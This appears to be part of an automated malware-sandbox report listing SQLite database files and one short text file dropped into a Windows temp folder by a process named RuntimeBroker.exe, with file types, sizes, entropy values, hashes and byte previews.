                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\k5AUKPgKmK

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\k81IHuot2X

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):25
                                                                                  Entropy (8bit):4.403856189774723
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:I/TTTk:I/TTTk
                                                                                  MD5:0C13A95A8E1409EAF6352ED26CC5DB12
                                                                                  SHA1:128EF32AF5594128E9AC7C859526563B7352C3B6
                                                                                  SHA-256:F5AAE7A030AD00E0D5050DB15C6BFDCCAEBD362F470041BA8E28F6F9ED3D480F
                                                                                  SHA-512:F51D7A0707E3C164279BBA68CC316D13BFA41995E0166A16455D235D7CF1F932D42A24FE88F674547E212757B9E521F1B1E7D5472360D2E6F942586EE31B2A04
                                                                                  Malicious:false
                                                                                  Preview:mUOHwXXtl8xh7ZyFEaLVklVvA

                                                                                  C:\Users\user\AppData\Local\Temp\kOcYdXXXiA

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\kRuhtGJwQs

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\kn0sl0dlVg

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\ksAR6Bohh8

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\lNQqiiEum5

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\lrnYZJn5p9

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\lw1t9N4arp

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\lyarlmjdiW

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\m1rvtu85KO

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\m5SDxSfTeE

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\mBv65Tg9xT

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\mK280ZccjB

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\mLyVdUoRER

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\mbBd912zD4

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\mmOi4IsthY

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\mrxydn2zzt

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\n5pMt6s7TY

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\nl7holVoK2

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\nnWegkJhQk

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\nxKuEJWqqb

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\nyfndCaDWD

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\o4MNAqQDfe

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
